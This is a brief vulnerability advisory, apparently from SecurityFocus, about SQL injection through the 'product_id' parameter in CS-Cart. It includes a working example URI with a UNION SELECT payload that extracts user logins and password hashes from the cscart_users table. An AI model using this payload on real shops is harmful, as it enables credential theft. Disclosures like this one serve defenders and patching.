CS-Cart 'product_id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus